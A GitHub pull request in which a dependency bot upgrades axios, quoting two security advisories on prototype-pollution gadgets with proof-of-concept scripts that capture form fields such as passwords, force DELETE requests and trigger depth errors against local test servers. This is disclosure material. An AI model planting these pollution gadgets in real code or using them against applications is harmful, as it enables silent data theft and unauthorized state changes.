Skip to content

chore(repo): Update dependency axios@<0.33.0 to v0.34.0 [SECURITY] - #10059

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-axios-0.33.0-vulnerability
Open

renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-axios-0.33.0-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Oct 3, 2026

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
axios@<0.33.0 (source) 0.33.0 → 0.34.0 age adoption passing confidence

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.


Axios: Prototype Pollution Gadget in axios toFormData Options

CVE-2026-101909 / GHSA-x97p-jq2g-jp4f

More information

Details

Summary

Axios form serialization reads visitor, maxDepth, dots, indexes, metaTokens, and Blob from an internal options object without own-property guards. When Object.prototype has been polluted elsewhere in the same process, those inherited values can change how axios serializes multipart and URL-encoded request bodies.

Axios does not create the prototype pollution source. This is a read-side gadget: axios turns an existing same-process pollution condition into altered request serialization or request failures.

Impact

The impact depends on which property is polluted and which axios serialization path the application uses.

Polluted dots, indexes, or metaTokens can change field names and cause the receiving service to parse different data than the caller intended. Polluted maxDepth can cause nested form submissions to throw ERR_FORM_DATA_DEPTH_EXCEEDED, producing request-level or service-level denial of service for affected workflows. Polluted visitor can execute as the serializer visitor if an attacker can place a function on Object.prototype, but that condition generally implies a stronger same-process code-execution or malicious-dependency primitive and should be described carefully.

Affected Functionality

Affected:

  • axios.toFormData().
  • transformRequest paths that serialize plain objects to multipart/form-data.
  • URL-encoded form serialization paths that rely on the same helper.
  • formSerializer option defaults when the relevant properties are absent as own properties.

Not affected:

  • JSON request bodies.
  • Requests that do not invoke toFormData().
  • Processes where Object.prototype is not polluted.
Technical Details

lib/helpers/toFormData.js merges caller options with defaults using utils.toFlatObject(). When options is undefined, toFlatObject() returns the default object unchanged:

{
  metaTokens: true,
  dots: false,
  indexes: false
}

That default object has Object.prototype in its prototype chain. toFormData() then reads behavior-affecting values directly:

const metaTokens = options.metaTokens;
const visitor = options.visitor || defaultVisitor;
const dots = options.dots;
const indexes = options.indexes;
const _Blob = options.Blob || (typeof Blob !== 'undefined' && Blob);
const maxDepth = options.maxDepth === undefined ? DEFAULT_FORM_DATA_MAX_DEPTH : options.maxDepth;

These reads can resolve inherited polluted properties.

Local code review confirmed the direct reads in v1.18.1. Tag checks show the option-based form serializer exists in v0.28.0 and later; maxDepth appears in the 1.x line from the form recursion fix.

Proof of Concept of Attack

Constrained local demonstration:

Object.prototype.maxDepth = 1;

await axios.post(url, { a: { b: { c: 'value' } } }, {
  headers: { 'Content-Type': 'multipart/form-data' }
});

Expected safe behavior is that the default max depth is used unless the caller sets an own formSerializer.maxDepth. Current behavior reads the inherited value and can throw ERR_FORM_DATA_DEPTH_EXCEEDED.

For serializer alteration, polluting Object.prototype.dots = true changes nested field naming from bracket notation to dot notation when the caller did not opt into that behavior.

Workarounds

Avoid serializing attacker-controlled objects as form data in a process with known prototype pollution. As a partial mitigation, callers can pass an own formSerializer object that sets explicit safe values for all relevant keys, including visitor, maxDepth, dots, indexes, metaTokens, and Blob.

Original report

Summary

axios v1.18.1 contains a read-side prototype pollution gadget in its form data serialization logic. Six option properties (visitor, maxDepth, dots, indexes, metaTokens, Blob) are read from a plain JavaScript object that inherits from Object.prototype without hasOwnProperty guards. When Object.prototype has been polluted elsewhere in the process a common consequence of compromised transitive npm dependencies, these polluted values silently control axios' form serialization behavior.

The highest-impact gadget is visitor: a polluted function on Object.prototype.visitor is invoked for every key-value pair during multipart and URL-encoded form serialization, receiving the value, key, path, and internal helper functions as arguments.

Details
Root Cause

The attack chain has three steps:
Step 1: formSerializer is read safely, but undefined flows through
In lib/defaults/index.js, the default transformRequest function reads formSerializer from config using the own() helper, which enforces hasOwnProp:

const formSerializer = own(this, 'formSerializer');

When the user does not explicitly configure formSerializer, this correctly returns undefined. That undefined is then passed as the options parameter to toFormData():

return toFormData(data, _FormData && new _FormData(), formSerializer);
//                                                     ^^^^^^^^^^^^ undefined

Step 2: toFlatObject returns a plain-object default
Inside lib/helpers/toFormData.js, options (which is undefined) is merged with defaults via utils.toFlatObject():

options = utils.toFlatObject(
    options,                                    // undefined
    { metaTokens: true, dots: false, indexes: false },  // plain object literal
    false,
    function defined(option, source) {
        return !utils.isUndefined(source[option]);
    }
);

toFlatObject has an early-return for null/undefined sources:

// lib/utils.js:607
if (sourceObj == null) return destObj;

Since options is undefined, the function returns destObj unchanged — the plain object { metaTokens: true, dots: false, indexes: false }. This object's prototype is Object.prototype.

Step 3: Options are read without hasOwnProp guards
The six option properties are read directly from the plain object:

const metaTokens = options.metaTokens;                                          // line 117
const visitor    = options.visitor || defaultVisitor;                            // line 119
const dots       = options.dots;                                                // line 120
const indexes    = options.indexes;                                             // line 121
const _Blob      = options.Blob || (typeof Blob !== 'undefined' && Blob);       // line 122
const maxDepth   = options.maxDepth === undefined                                // line 123
                     ? DEFAULT_FORM_DATA_MAX_DEPTH
                     : options.maxDepth;

None of these reads use utils.hasOwnProp(). Since the options object inherits from Object.prototype, any property set on Object.prototype by a compromised dependency is resolved through the prototype chain.

Why the Existing Defenses Didn't Catch This

axios has extensive prototype pollution defenses. However, those defenses are all focused on the config object (created by mergeConfig, which returns Object.create(null)). The toFormData function creates its own internal options object that sits outside that boundary, and the 6 reads on that internal object were never audited.

PoC
Reproduction Steps
Environment

Any environment with Node.js and npm. Tested on:
- Node.js v24.15.0, npm 11.13.0
- axios v1.18.1 (latest release at time of writing)

Step 1: Create a fresh project
mkdir axios-pp-poc
cd axios-pp-poc
npm init -y
npm install axios@1.18.1
Step 2: Create the PoC file

Create poc.mjs with the following content:

import axios from 'axios';
import http from 'http';

// Simulate pollution from a compromised transitive dependency
let stolen = [];
Object.prototype.visitor = function(value, key, path, helpers) {
    stolen.push({ key, value });
    return helpers.defaultVisitor.call(this, value, key, path);
};
Object.prototype.maxDepth = 2;

const server = http.createServer((req, res) => {
    res.writeHead(200);
    res.end('{}');
});

server.listen(0, '127.0.0.1', async () => {
    const { port } = server.address();
    try {
        // Exfiltration: visitor intercepts all form fields
        await axios.post(`http://127.0.0.1:${port}/`, {
            username: 'john',
            password: 'SuperSecret123!',
            profile: { ssn: '123-45-6789' }
        }, { headers: { 'Content-Type': 'multipart/form-data' } });

        console.log('Stolen:', stolen);
        // Stolen: [
        //   { key: 'username', value: 'john' },
        //   { key: 'password', value: 'SuperSecret123!' },
        //   { key: 'profile',  value: { ssn: '123-45-6789' } },
        //   { key: 'ssn',      value: '123-45-6789' }
        // ]

        // DoS: nested object rejected by polluted maxDepth
        await axios.post(`http://127.0.0.1:${port}/`,
            { a: { b: { c: { d: 'value' } } } },
            { headers: { 'Content-Type': 'multipart/form-data' } }
        );
        // Throws: ERR_FORM_DATA_DEPTH_EXCEEDED
        //   "Object is too deeply nested (3 levels). Max depth: 2"
    } finally {
        delete Object.prototype.visitor;
        delete Object.prototype.maxDepth;
        server.close();
    }
});
Step 3: Run the PoC
node poc.mjs
Impact
1. Data Exfiltration via visitor (Confidentiality: High)

A polluted Object.prototype.visitor function is called as the form data visitor:

visitor.call(formData, el, key, path, exposedHelpers)

The attacker receives:
- value — the raw value being serialized (passwords, tokens, PII, API keys)
- key — the field name
- path — the full path array (e.g., ['profile', 'address', 'street'])
- exposedHelpers — internal helpers including defaultVisitor, convertValue, isVisitable

By delegating to helpers.defaultVisitor, the attack is completely transparent, the request succeeds normally and the server receives intact data. The exfiltration is invisible to both the caller and the server.

2. Denial of Service via maxDepth (Availability: Low)

A polluted Object.prototype.maxDepth of 1 or 2 causes any moderately nested form data request to throw ERR_FORM_DATA_DEPTH_EXCEEDED. Applications that send nested objects as form data (common with APIs that accept profile[name], address[city], etc.) will experience mysterious failures.

3. Data Corruption via dots, indexes, metaTokens (Integrity: Low)

Polluting these options changes the serialization format of form field names:
- dots: true — changes bracket notation (user[name]) to dot notation (user.name)
- indexes: true — changes array serialization (items[]) to indexed (items[0], items[1])
- metaTokens: false — changes obj{} keys to raw json strings

The server may misinterpret the submitted form data, leading to silent data corruption.


Severity

  • CVSS Score: 8.3 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Axios: Prototype-Pollution Gadget in the Default Instance Allows Inherited Object.prototype.method to Override HTTP Method

CVE-2026-101902 / GHSA-9fr6-4gfg-395g

More information

Details

Summary

Axios default-instance requests that omit an explicit method can read an inherited method value from Object.prototype. If another vulnerability in the same process pollutes Object.prototype.method, calls such as axios.request({ url }) and axios({ url }) can send a state-changing HTTP method instead of the expected default GET.

Axios does not create the prototype pollution source. This is a read-side gadget in axios request dispatch.

Impact

In an affected application with a separate prototype-pollution primitive, an attacker can change axios default-instance requests that omit method from GET to methods such as DELETE, POST, PUT, or PATCH. The practical impact depends on the target endpoint and can include unintended writes, deletion, or other state changes.

Method aliases such as axios.get(url) and requests with an explicit own method are not affected by the confirmed method path.

Affected Functionality

Affected:

  • Default axios instance calls: axios.request({ url }).
  • Callable shorthand: axios({ url }).
  • Requests where no own config.method is provided.

Not affected in the confirmed method PoC:

  • axios.get(url) and other method aliases.
  • axios.request({ url, method: 'GET' }).
  • axios.create().request({ url }) when the created instance defaults are produced by current mergeConfig() and do not inherit from Object.prototype.
Technical Details

lib/core/Axios.js sets the request method with:

config.method = (config.method || this.defaults.method || 'get').toLowerCase();

mergeConfig() now returns a null-prototype request config, so config.method is safe from Object.prototype. However, the default axios instance stores the module defaults object as this.defaults, and that defaults object is a normal object. If Object.prototype.method exists, this.defaults.method resolves to the polluted inherited value.

Local verification on axios 1.18.1 showed a default-instance axios.request({ url }) request reaching a loopback server as DELETE after Object.prototype.method = 'DELETE'.

Proof of Concept of Attack

Constrained local demonstration:

Object.prototype.method = 'DELETE';
try {
  await axios.request({ url: 'http://127.0.0.1:<port>/resource' });
} finally {
  delete Object.prototype.method;
}

Expected safe behavior is a GET request. Current affected behavior sends DELETE on the default instance when no method is provided.

Workarounds

Use explicit method aliases such as axios.get() or set an own method on request configs. Avoid default-instance shorthand for requests in processes where prototype pollution is suspected or possible.

Original report

Summary

Axios 1.17.0 contains a read-side prototype-pollution gadget in the default Axios instance. If another vulnerability in the same Node.js process pollutes Object.prototype.method, default-instance calls such as axios.request({ url }) and axios({ url }) can be forced to use an attacker-controlled HTTP method, such as DELETE, instead of the expected default GET.

Axios does not create the prototype pollution by itself. The issue is that Axios reads fallback values from this.defaults without an own-property guard, allowing inherited values from Object.prototype to influence request behavior.

This should be treated as a prototype-pollution gadget, not as a standalone prototype-pollution source. In other words, Axios is not the component that lets the attacker write to Object.prototype; Axios is the component that becomes dangerous after Object.prototype has already been polluted by another bug in the same process.

Details

The vulnerable fallback read is in lib/core/Axios.js:

// Set config.allowAbsoluteUrls
if (config.allowAbsoluteUrls !== undefined) {
  // do nothing
} else if (this.defaults.allowAbsoluteUrls !== undefined) {
  config.allowAbsoluteUrls = this.defaults.allowAbsoluteUrls;
} else {
  config.allowAbsoluteUrls = true;
}

// Set config.method
config.method = (config.method || this.defaults.method || 'get').toLowerCase();

The merged request config is created as a null-prototype object in lib/core/mergeConfig.js:

const config = Object.create(null);

Therefore, when the caller does not provide config.method, the fallback becomes:

this.defaults.method

The default Axios instance uses the module defaults object. In the tested version, that defaults object is affected by inherited properties from Object.prototype. If Object.prototype.method is polluted, this.defaults.method resolves to that inherited value and Axios uses it as the request method.

The same unsafe inherited-property pattern also affects this.defaults.allowAbsoluteUrls, which can change how absolute URLs are combined with baseURL.

Proof of Concept
Access and Attack Conditions

No admin access is required for Axios itself. This is a library-level gadget.

The attacker must have an existing way to pollute Object.prototype in the same Node.js process, for example through a separate prototype-pollution vulnerability in another dependency or application input path. Axios is the gadget that turns that pollution into dangerous HTTP request behavior.

Required condition:

Some other bug or unsafe merge path in the application must allow Object.prototype pollution.

What Axios contributes:

Axios reads inherited Object.prototype.method through this.defaults.method and uses it as the HTTP method fallback.

What Axios does not do:

Axios does not create Object.prototype pollution by itself.

Affected usage:

axios.request({ url });
axios({ url });

Not affected in the confirmed PoC:

axios.get(url);
axios.request({ url, method: "GET" });
axios.create().request({ url });
Reproduction Steps
  1. Create a clean test directory and install Axios 1.17.0:
mkdir axios-validation
cd axios-validation
npm init -y
npm install axios@1.17.0 --no-audit --no-fund
  1. Save the method override PoC below as:
validate-prototype-method-gadget.mjs
  1. Run the PoC:
node validate-prototype-method-gadget.mjs
  1. Confirm that the output shows:
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
  1. This proves that after Object.prototype.method = "DELETE", default-instance calls that omit an explicit method are sent as DELETE.
What the Method PoC Script Does

The PoC starts a temporary local HTTP server for each Axios call and records the HTTP method received by that server. It then simulates an already-existing prototype-pollution condition by setting:

Object.prototype.method = "DELETE";

While that pollution is active, the script sends five Axios requests:

axios.request({ url });                 // expected vulnerable path
axios({ url });                         // expected vulnerable shorthand path
axios.get(url);                         // expected safe alias path
axios.request({ url, method: "GET" });  // expected safe explicit-method path
axios.create().request({ url });        // expected safe isolated-instance path

The script then deletes the polluted property:

delete Object.prototype.method;

Finally, it prints the method observed by the local server for each request. The vulnerable behavior is confirmed when the default Axios instance sends DELETE for axios.request({ url }) and axios({ url }), while the safe comparison paths still send GET.

Method Override PoC

Create validate-prototype-method-gadget.mjs:

import http from "node:http";
import axios from "axios";

async function listen(server) {
  await new Promise((resolve) => server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}

async function runRequest(label, requestFn) {
  const hits = [];
  const server = http.createServer((req, res) => {
    hits.push({
      method: req.method,
      url: req.url,
    });
    res.writeHead(200, { "content-type": "application/json" });
    res.end(JSON.stringify({ ok: true }));
  });

  const port = await listen(server);
  const url = `http://127.0.0.1:${port}/${label}`;

  let status = "completed";
  let error = "";
  try {
    await requestFn(url);
  } catch (err) {
    status = "error";
    error = err?.message || String(err);
  }

  server.close();
  return { label, status, error, hits };
}

const results = [];

Object.prototype.method = "DELETE";
try {
  results.push(await runRequest("default-request-no-method", (url) => axios.request({ url })));
  results.push(await runRequest("default-shorthand-no-method", (url) => axios({ url })));
  results.push(await runRequest("default-get-alias", (url) => axios.get(url)));
  results.push(await runRequest("default-request-explicit-get", (url) => axios.request({ url, method: "GET" })));

  const instance = axios.create();
  results.push(await runRequest("created-instance-request-no-method", (url) => instance.request({ url })));
} finally {
  delete Object.prototype.method;
}

const defaultRequestMethod = results.find((r) => r.label === "default-request-no-method")?.hits[0]?.method || "";
const defaultShorthandMethod = results.find((r) => r.label === "default-shorthand-no-method")?.hits[0]?.method || "";
const getAliasMethod = results.find((r) => r.label === "default-get-alias")?.hits[0]?.method || "";
const explicitGetMethod = results.find((r) => r.label === "default-request-explicit-get")?.hits[0]?.method || "";
const createdInstanceMethod = results.find((r) => r.label === "created-instance-request-no-method")?.hits[0]?.method || "";

console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
console.log(`defaultRequestMethod=${defaultRequestMethod}`);
console.log(`defaultShorthandMethod=${defaultShorthandMethod}`);
console.log(`getAliasMethod=${getAliasMethod}`);
console.log(`explicitGetMethod=${explicitGetMethod}`);
console.log(`createdInstanceMethod=${createdInstanceMethod}`);

const confirmed =
  defaultRequestMethod === "DELETE" &&
  defaultShorthandMethod === "DELETE" &&
  getAliasMethod === "GET" &&
  explicitGetMethod === "GET" &&
  createdInstanceMethod === "GET";

console.log(confirmed ? "RESULT: CONFIRMED" : "RESULT: NOT CONFIRMED");
process.exitCode = confirmed ? 0 : 1;

Run:

node validate-prototype-method-gadget.mjs

Observed result:

axiosVersion=1.17.0
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED

The local server received:

axios.request({ url })              -> DELETE
axios({ url })                      -> DELETE
axios.get(url)                      -> GET
axios.request({ url, method:"GET" }) -> GET
axios.create().request({ url })     -> GET

This confirms that inherited Object.prototype.method controls the default method for vulnerable default-instance request paths.

Supporting allowAbsoluteUrls Gadget Evidence

The same inherited-property issue affects allowAbsoluteUrls.

Create validate-prototype-allowabsoluteurls-gadget.mjs:

import http from "node:http";
import axios from "axios";

async function listen(server) {
  await new Promise((resolve) => server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}

async function runCase(label, requestFn) {
  const baseHits = [];
  const absoluteHits = [];

  const baseServer = http.createServer((req, res) => {
    baseHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("base");
  });

  const absoluteServer = http.createServer((req, res) => {
    absoluteHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("absolute");
  });

  const basePort = await listen(baseServer);
  const absolutePort = await listen(absoluteServer);

  try {
    await requestFn({
      baseURL: `http://127.0.0.1:${basePort}/api`,
      url: `http://127.0.0.1:${absolutePort}/absolute-path`,
    });
  } catch {}

  baseServer.close();
  absoluteServer.close();

  return { label, baseHits, absoluteHits };
}

const results = [];

results.push(await runCase("baseline-no-pollution", (config) => axios.request(config)));

Object.prototype.allowAbsoluteUrls = false;
try {
  results.push(await runCase("polluted-default-request", (config) => axios.request(config)));
  const instance = axios.create();
  results.push(await runCase("polluted-created-instance", (config) => instance.request(config)));
} finally {
  delete Object.prototype.allowAbsoluteUrls;
}

console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);

Observed result:

axiosVersion=1.17.0
baselineUsedAbsolute=true
pollutedDefaultUsedBase=true
pollutedInstanceUsedAbsolute=true
RESULT: CONFIRMED

Without pollution, Axios sends the request to the absolute URL. After Object.prototype.allowAbsoluteUrls = false, the default Axios instance combines the absolute URL with baseURL and sends the request to the base server instead. An instance created with axios.create() remains unaffected.

Impact

This is a prototype-pollution gadget. It becomes exploitable when an application has any separate prototype-pollution primitive that allows an attacker to set properties on Object.prototype in the same Node.js process.

If such pollution is possible, an attacker can influence Axios default-instance requests that omit an explicit method:

  • axios.request({ url })
  • axios({ url })

This can turn an expected safe default GET request into a state-changing method such as:

  • DELETE
  • POST
  • PUT
  • PATCH

Potential impact includes unauthorized state-changing requests, deletion of resources, unintended writes, data corruption, or denial of service when the target endpoint treats the HTTP method as security-relevant.

The issue does not require admin access to Axios itself, but it does require an existing prototype-pollution path in the application. Applications that always use explicit methods, method aliases such as axios.get(), or isolated instances created through axios.create() are not affected by the confirmed method-override path.


Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

axios/axios (axios@<0.33.0)

v0.34.0

Compare Source

v0.34.0 — September 13, 2026

This release hardens request configuration and proxy handling, adds caller diagnostics and cancellation context, and tightens TypeScript header types.

⚠️ Breaking Changes & Deprecations

  • Header Types: TypeScript now rejects header values that are Promises, functions, or objects with custom toString() methods. Resolve promises, call functions, or explicitly convert objects before assigning header values. Supported scalar, array, and grouped headers remain available. (#​11209)
  • Proxy Routing: NO_PROXY / no_proxy entries now support IPv4 and IPv6 CIDR ranges. Previously ineffective ranges now cause matching IP destinations to bypass the proxy; review existing ranges when upgrading. (#​11172)

🔒 Security Fixes

  • Request Configuration: Prevent inherited properties from influencing form serializer options, default request methods, headers on interceptor-returned configs, and HTTP redirect hooks. Applications relying on inherited options must define those values as own properties. (#​11172)
  • Hostname Processing: Replace quadratic regular-expression backtracking in proxy bypass hostname normalization with a linear scan, preventing excessive processing of crafted redirect hostnames. (#​11172)

🚀 New Features

  • Caller Diagnostics: Enable captureCallerStack: true on a request or instance to append original caller frames to asynchronous error stacks. Disabled by default. (#​11209)
  • Cancellation Context: Preserve AbortSignal.reason as CanceledError.reason, including objects and falsy values. Native and structural signals retain their identity and live getters through config merging. (#​11209)

🐛 Bug Fixes

  • Proxy Protocols: Accept HTTP(S) proxy schemes with or without a trailing colon, including casing and surrounding whitespace variations. Invalid nonempty strings now fail before connecting with ERR_BAD_OPTION_VALUE; redirect failures retain ERR_FR_REDIRECTION_FAILURE wrapping. Omitted protocols continue to inherit the target protocol. (#​11182)
  • Request Interceptors: Route synchronous interceptor and dispatch failures through response interceptors. Await recovery promises before dispatch; rejected recovery prevents sending the request, while successful recovery retains the last request config and ignores recovery return values. (#​11209)
  • Error Compatibility: Allow Axios to load alongside a read-only Error.prototype.toJSON, while preserving supplied own property descriptors and setters. (#​11209)

🔧 Maintenance & Chores

  • Publishing and Tests: Use npm bundled with Node in the v0 publishing workflow and replace the FormData browser test’s external HTTP request with a Jasmine-Ajax stub. (#​11084)
  • Repository Cleanup: Add .codex/ to .gitignore. (#​11033)
  • Release Preparation: Update package and runtime version metadata to 0.34.0. (#​11217)

Full Changelog: axios/axios@v0.33.0...v0.34.0


Configuration

📅 Schedule: (in timezone GMT)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Oct 3, 2026
@vercel

vercel Bot commented Oct 3, 2026 •

Copy link
Copy Markdown

The latest updates on your projects. Learn more about Vercel for GitHub.

Project Deployment Actions Updated
clerk-js-sandbox Ready Ready Preview Oct 3, 2026 11:14pm UTC
swingset Ready Ready Preview Oct 3, 2026 11:14pm UTC

Request Review

@changeset-bot

changeset-bot Bot commented Oct 3, 2026

Copy link
Copy Markdown

⚠️ No Changeset found

Latest commit: 10385f7

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

@coderabbitai

coderabbitai Bot commented Oct 3, 2026

Copy link
Copy Markdown
Contributor

Important

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

⚙️ Run configuration
  • Configuration used: Repository YAML (base), Organization UI (inherited)
  • Review profile: ASSERTIVE
  • Plan: Advanced
  • Run ID: 2daf9318-e606-4b33-80a9-158a3af954f0

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Use the checkbox below for a quick retry:

  • 🔍 Trigger review
  • Autopilot · Keep fixing CodeRabbit findings and required CI, and resolving merge conflicts

Comment @coderabbitai help to get the list of available commands.

@pkg-pr-new

pkg-pr-new Bot commented Oct 3, 2026

Copy link
Copy Markdown

Open in StackBlitz

@clerk/astro

npm i https://pkg.pr.new/@clerk/astro@10059

@clerk/backend

npm i https://pkg.pr.new/@clerk/backend@10059

@clerk/chrome-extension

npm i https://pkg.pr.new/@clerk/chrome-extension@10059

@clerk/clerk-js

npm i https://pkg.pr.new/@clerk/clerk-js@10059

@clerk/electron

npm i https://pkg.pr.new/@clerk/electron@10059

@clerk/electron-passkeys

npm i https://pkg.pr.new/@clerk/electron-passkeys@10059

@clerk/eslint-plugin

npm i https://pkg.pr.new/@clerk/eslint-plugin@10059

@clerk/expo

npm i https://pkg.pr.new/@clerk/expo@10059

@clerk/expo-biometrics

npm i https://pkg.pr.new/@clerk/expo-biometrics@10059

@clerk/expo-google-signin

npm i https://pkg.pr.new/@clerk/expo-google-signin@10059

@clerk/expo-passkeys

npm i https://pkg.pr.new/@clerk/expo-passkeys@10059

@clerk/express

npm i https://pkg.pr.new/@clerk/express@10059

@clerk/fastify

npm i https://pkg.pr.new/@clerk/fastify@10059

@clerk/hono

npm i https://pkg.pr.new/@clerk/hono@10059

@clerk/localizations

npm i https://pkg.pr.new/@clerk/localizations@10059

@clerk/mosaic

npm i https://pkg.pr.new/@clerk/mosaic@10059

@clerk/nextjs

npm i https://pkg.pr.new/@clerk/nextjs@10059

@clerk/nuxt

npm i https://pkg.pr.new/@clerk/nuxt@10059

@clerk/react

npm i https://pkg.pr.new/@clerk/react@10059

@clerk/react-router

npm i https://pkg.pr.new/@clerk/react-router@10059

@clerk/shared

npm i https://pkg.pr.new/@clerk/shared@10059

@clerk/tanstack-react-start

npm i https://pkg.pr.new/@clerk/tanstack-react-start@10059

@clerk/testing

npm i https://pkg.pr.new/@clerk/testing@10059

@clerk/ui

npm i https://pkg.pr.new/@clerk/ui@10059

@clerk/upgrade

npm i https://pkg.pr.new/@clerk/upgrade@10059

@clerk/vue

npm i https://pkg.pr.new/@clerk/vue@10059

commit: 10385f7

This branch was successfully deployed

2 active deployments
Preview – swingset — 10385f76 Deployed Oct 3, 2026 by vercel[bot]
Preview – clerk-js-sandbox — 10385f76 Deployed Oct 3, 2026 by vercel[bot]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants